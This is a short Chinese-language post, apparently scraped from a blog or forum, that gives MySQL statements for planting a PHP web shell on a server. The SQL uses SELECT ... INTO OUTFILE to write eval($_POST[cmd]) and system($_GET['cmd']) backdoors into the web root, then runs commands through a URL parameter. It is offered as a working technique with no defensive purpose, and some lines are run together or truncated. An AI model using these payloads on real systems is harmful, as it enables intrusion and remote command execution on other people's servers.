作者:手机用户2502854041 | 来源:互联网 | 2017-11-12 12:27
CreateTABLElinuxso(cmdtextNOTNULL);InsertINTOlinuxso(cmd)VALUES(?phpeval($_POST[cmd])?);selectcmdfromstudyintooutfileE:wampwww7.php;DropTABLEIFEXISTSstudy;CreateTABLE`wangzi`(`wangzi`TEXTNOTNULL)TYPEM
Create TABLE linuxso (cmd text NOT NULL);
Insert INTO linuxso (cmd) VALUES('php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `wangzi` ( `wangzi` ) VALUES ('');
Select `wangzi` FROM `wangzi` INTO OUTFILE 'C:/xampp/htdocs/xampp/cmd.php'; Drop TABLE `wangzi`;
--------------------------------------------------------------------------
而后在国外bbs' target='_blank'>论坛上看到一老外的方法更简单:
1:select load_file('E:/xamp/www/linuxso.php');
2:select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/linuxso.php'
然后访问网站目录:http://localhost/linuxso.php?cmd=dir
3:写一句话: select ''INTO OUTFILE 'E:/xamp/www/linuxso.php'
第三个是直接在SQL查询里导出一句话,必须要先知道网站的路径